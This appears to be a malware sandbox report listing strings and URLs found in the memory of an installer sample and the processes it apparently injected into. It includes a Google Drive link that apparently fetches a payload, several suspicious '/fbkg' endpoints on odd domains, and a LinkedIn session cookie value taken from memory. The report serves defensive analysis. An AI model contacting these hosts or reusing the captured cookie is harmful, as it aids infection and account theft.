        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000055BC000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.12313059308.0000000027C9C000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007C65000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16766230886.0000000007C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11923831613.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11935105503.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12020742833.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11923831613.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11935105503.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12020742833.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: U6SJBLxT2Z.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
        Source: extrac32.exe, 00000005.00000002.16763654407.0000000006AAE000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.000000000404E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alwayswim.com/fbkg?gp=1&js=1&uuid=1700245835.0022985391&other_args=eyJ1cmkiOiAiL2Zia2ciLC
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16760933797.0000000000CE3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jilimacao1.com
        Source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16760933797.0000000000CE3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jilimacao1.com/fbkg/
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11923831613.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11935105503.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12020742833.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.000000000404E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www70.alwayswim.com/
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12261420021.0000000008422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12261420021.0000000008422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020464964.0000000002678000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11923831613.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11935105503.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12020742833.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-08-18-docs.googleusercontent.com/
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11923831613.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11935105503.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12020742833.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-08-18-docs.googleusercontent.com/D
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020464964.0000000002678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-08-18-docs.googleusercontent.com/I?
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020742833.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-08-18-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/akjdvekd
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020464964.0000000002638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020464964.0000000002638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/a
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020464964.0000000002638000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12032526882.0000000031BA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020464964.0000000002638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15oDBUcwjnps0SIy7xJNJoKORP-vQHwY53
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020464964.0000000002638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15oDBUcwjnps0SIy7xJNJoKORP-vQHwY53g~
        Source: 54Z8E45.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007D0F000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16766230886.0000000007CA7000.00000004.00000020.00020000.00000000.sdmp, 54Z8E45.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 54Z8E45.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.0000000005C8C000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.000000000322C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dxymtz03.cc/cpc05/?channelCode=cpc05
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12261420021.0000000008422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12261420021.0000000008422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
        Source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: extrac32.exe, 00000005.00000002.16763654407.000000000691C000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003EBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://littlehappiez.com/fbkg?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o
        Source: extrac32.exe, 00000005.00000002.16759017715.000000000336A000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16759017715.000000000337C000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16759017715.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: extrac32.exe, 00000005.00000002.16759017715.000000000337C000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16759017715.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: extrac32.exe, 00000005.00000002.16759017715.000000000337C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: extrac32.exe, 00000005.00000002.16759017715.000000000336A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/p77
        Source: extrac32.exe, 00000005.00000002.16759017715.000000000337C000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16759017715.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.0000000005FB0000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003550000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mdnew.oss-cn-hongkong.aliyuncs.com/tz999.js
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11923831613.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11935105503.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12020742833.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: extrac32.exe, 00000005.00000002.16759017715.0000000003360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
        Source: extrac32.exe, 00000005.00000002.16759017715.0000000003360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: extrac32.exe, 00000005.00000003.12199307426.0000000007C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdms-gamingoverlay://kglcheck/res://C:
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.lets-room.online&rand=
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007D0F000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16766230886.0000000007CA7000.00000004.00000020.00020000.00000000.sdmp, 54Z8E45.5.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007D0F000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16766230886.0000000007CA7000.00000004.00000020.00020000.00000000.sdmp, 54Z8E45.5.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.0000000006C40000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
        Source: extrac32.exe, 00000005.00000002.16766230886.0000000007D0F000.00000004.00000020.00020000.00000000.sdmp, 54Z8E45.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
        Source: extrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_lan
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land_h
